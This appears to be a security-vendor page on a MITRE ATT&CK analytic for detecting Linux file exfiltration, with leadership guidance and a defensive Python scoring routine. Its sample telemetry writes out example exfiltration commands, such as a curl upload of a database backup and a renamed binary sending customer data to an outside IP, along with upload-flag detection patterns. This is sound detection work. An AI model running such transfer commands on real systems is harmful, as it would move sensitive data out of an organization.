AN0368: Analytic 0368
Detects file exfiltration using tools like curl, scp, or custom binaries over protocols such as FTP, HTTP/S, or DNS tunneling, especially outside baseline user behavior.
Analyst context for executives and security teams
This analytic matters because it focuses on potential file exfiltration from Linux systems using common transfer tools or custom binaries over FTP, HTTP/S, or DNS tunneling. For leaders, the decision value is whether the organization can distinguish normal Linux data movement from suspicious outbound transfer behavior before sensitive data loss becomes an incident-response and compliance problem.
Executive priority
Prioritize this as a data-loss and operational resilience validation item for Linux environments that store or process sensitive information. Executives should ask whether outbound transfer behavior is baselined, whether SOC teams can investigate unusual use of curl, scp, or custom binaries, and whether evidence would support incident decisions, regulatory inquiries, or customer-impact assessments if exfiltration were suspected.
Technical view
For SOC, detection engineering, and IR teams, validate visibility into Linux process execution, command-line activity, file access, outbound network connections, and DNS activity. The analytic description emphasizes exfiltration using tools such as curl, scp, or custom binaries over FTP, HTTP/S, or DNS tunneling, especially when activity deviates from baseline user behavior. Because no official detection logic or ATT&CK relationships were supplied, teams should treat this as a detection objective rather than a ready-to-deploy rule.
Likely telemetry
- Linux process execution telemetry, including executable name and command-line arguments
- User and host context for baseline comparison
- File access or file staging evidence where available
- Outbound network connection metadata for FTP, HTTP/S, and SSH/SCP-related activity
- DNS query logs and DNS volume/pattern data for possible tunneling indicators
Detection direction
- Validate that Linux endpoint and network telemetry can correlate process activity with outbound destinations and transferred data patterns.
- Baseline expected use of curl, scp, and other transfer utilities by user, host role, schedule, and destination to reduce false positives.
- Look for deviations from normal behavior, such as unusual users, uncommon destinations, abnormal transfer volume, unexpected protocols, or atypical timing.
- Include custom or renamed binaries in detection design by relying on behavior, command-line, file path, network activity, and parent-process context rather than tool name alone.
- Review blind spots around encrypted HTTP/S traffic, unmanaged Linux hosts, limited command-line logging, DNS visibility gaps, and egress paths that bypass central logging.
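The baseline-and-deviation approach in the list above, written out as a small scoring routine. This is an added illustration, not detection logic from MITRE or from the Glexia page: the baseline profiles, host roles, thresholds, sample process events and DNS queries are all constructed here, and the field names (`image`, `cmdline`, `dest`, `dport`, `bytes_out`, `qname`) are assumptions about what a normalized Linux telemetry pipeline would carry. It scores an outbound-transfer event by behaviour (command-line upload arguments, destination, port, hour, volume) rather than by tool name alone, so a renamed or custom binary is still caught, and separately flags hosts whose DNS queries to a single zone look like tunnelled data.

```python
"""Baseline-deviation scoring for Linux outbound transfer telemetry (constructed example)."""
import os
from collections import defaultdict
from datetime import datetime

# Constructed baseline of authorised transfer behaviour, keyed by (user, host role).
BASELINE = {
    ("backup", "db"): {"tools": {"scp"}, "dests": {"backup.internal.example"},
                       "ports": {22}, "hours": range(1, 5), "max_bytes": 5_000_000_000},
    ("ci", "build"): {"tools": {"curl"}, "dests": {"artifacts.internal.example"},
                      "ports": {443}, "hours": range(0, 24), "max_bytes": 500_000_000},
}
HOST_ROLE = {"db01": "db", "build03": "build", "web02": "web"}   # constructed CMDB lookup
TRANSFER_TOOLS = {"curl", "wget", "scp", "sftp", "ftp", "rsync"}
# Argument forms that push local data out; they matter even when the binary has been renamed.
UPLOAD_FLAGS = {"-T", "--upload-file", "-F", "--form", "--data-binary"}


def classify_event(ev):
    """Return the reasons an event deviates from baseline; [] means expected or not a transfer."""
    tool = os.path.basename(ev["image"])
    tokens = ev["cmdline"].split()
    pushes_data = any(t in UPLOAD_FLAGS or t.startswith("@/") for t in tokens)
    if tool not in TRANSFER_TOOLS and not pushes_data:
        return []                                   # not transfer behaviour at all
    reasons = []
    if tool not in TRANSFER_TOOLS:
        reasons.append("custom_or_renamed_binary")  # behaviour matched, name did not
    profile = BASELINE.get((ev["user"], HOST_ROLE.get(ev["host"], "unknown")))
    if profile is None:
        return reasons + ["no_baseline_for_user_on_host_role"]
    if tool not in profile["tools"]:
        reasons.append("unexpected_tool")
    if ev["dest"] not in profile["dests"]:
        reasons.append("unexpected_destination")
    if ev["dport"] not in profile["ports"]:
        reasons.append("unexpected_protocol_port")
    if datetime.fromisoformat(ev["ts"]).hour not in profile["hours"]:
        reasons.append("off_hours")
    if ev["bytes_out"] > profile["max_bytes"]:
        reasons.append("abnormal_volume")
    return reasons


def dns_tunnel_indicators(queries, min_unique=50, min_avg_label=30):
    """Flag hosts that send many unique, long subdomains to one zone. Returns {host: [zone]}."""
    seen = defaultdict(set)                         # (host, zone) -> unique subdomain parts
    for q in queries:
        labels = q["qname"].rstrip(".").split(".")
        if len(labels) < 3:
            continue
        seen[(q["host"], ".".join(labels[-2:]))].add(".".join(labels[:-2]))
    flagged = defaultdict(list)
    for (host, zone), subs in seen.items():
        avg_len = sum(len(s) for s in subs) / len(subs)
        if len(subs) >= min_unique and avg_len >= min_avg_label:
            flagged[host].append(zone)
    return dict(flagged)


# Constructed sample telemetry: one expected backup, one off-hours curl upload, one renamed
# binary on a web host, one expected CI upload, and one non-transfer command.
SAMPLE_EVENTS = [
    {"ts": "2024-03-10T02:15:00", "host": "db01", "user": "backup", "image": "/usr/bin/scp",
     "cmdline": "scp /var/backups/db.tgz backup.internal.example:/bk/",
     "dest": "backup.internal.example", "dport": 22, "bytes_out": 2_000_000_000},
    {"ts": "2024-03-10T23:40:00", "host": "db01", "user": "backup", "image": "/usr/bin/curl",
     "cmdline": "curl -T /var/backups/db.tgz https://files.example.net/u",
     "dest": "files.example.net", "dport": 443, "bytes_out": 2_000_000_000},
    {"ts": "2024-03-10T14:00:00", "host": "web02", "user": "www-data", "image": "/opt/tools/sync",
     "cmdline": "sync --upload-file /srv/data/customers.csv http://198.51.100.7/",
     "dest": "198.51.100.7", "dport": 80, "bytes_out": 80_000_000},
    {"ts": "2024-03-10T14:05:00", "host": "build03", "user": "ci", "image": "/usr/bin/curl",
     "cmdline": "curl -F file=@build.log https://artifacts.internal.example/up",
     "dest": "artifacts.internal.example", "dport": 443, "bytes_out": 20_000},
    {"ts": "2024-03-10T14:06:00", "host": "web02", "user": "www-data", "image": "/usr/bin/ls",
     "cmdline": "ls -la /srv/data", "dest": None, "dport": None, "bytes_out": 0},
]
SAMPLE_DNS = (
    [{"host": "web02", "qname": f"{i:032x}.tun.example.net"} for i in range(60)]
    + [{"host": "db01", "qname": "backup.internal.example"}, {"host": "web02", "qname": "www.example.com"}]
)

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(ev["host"], ev["user"], os.path.basename(ev["image"]), classify_event(ev))
    print("dns tunnelling candidates:", dns_tunnel_indicators(SAMPLE_DNS))
```

The thresholds and profiles are placeholders to be replaced by values derived from the environment's own baselines; in production the `BASELINE` map would be generated from an observation window rather than hand-written, and the DNS check would run over a sliding window per host.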
Mitigation priorities
- Establish or improve Linux egress monitoring and logging before relying on this analytic for response decisions.
- Restrict unnecessary outbound protocols and destinations from sensitive Linux systems where business operations allow.
- Apply least-privilege access to sensitive files and systems to reduce the value and scope of potential exfiltration.
- Maintain baselines for authorized administrative and application data-transfer behavior.
- Ensure incident response playbooks include triage steps for suspected Linux-based file exfiltration, including user validation, host containment decisions, and preservation of endpoint, network, proxy, and DNS evidence.
Analyst notes and limits
The supplied object is a MITRE ATT&CK detection analytic for Linux focused on detecting file exfiltration behavior using tools such as curl, scp, or custom binaries over FTP, HTTP/S, or DNS tunneling. No tactics, relationships, or official detection implementation were provided, so recommendations are framed as validation and engineering direction rather than a specific rule.
This take is limited to the supplied STIX fields, external reference, and lack of relationship context. It does not establish active exploitation, attribution, affected products, guaranteed detection coverage, or applicability beyond Linux. Local environment baselines, logging coverage, and approved data-transfer workflows are required to determine materiality and tune detections.
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
All related ATT&CK context
No relationships are available in the current normalized data for this object.
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates.
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | | 1.0 | | Current bundle | 0be8b7a1ccf2… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
- [1] mitre-attack: AN0368
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.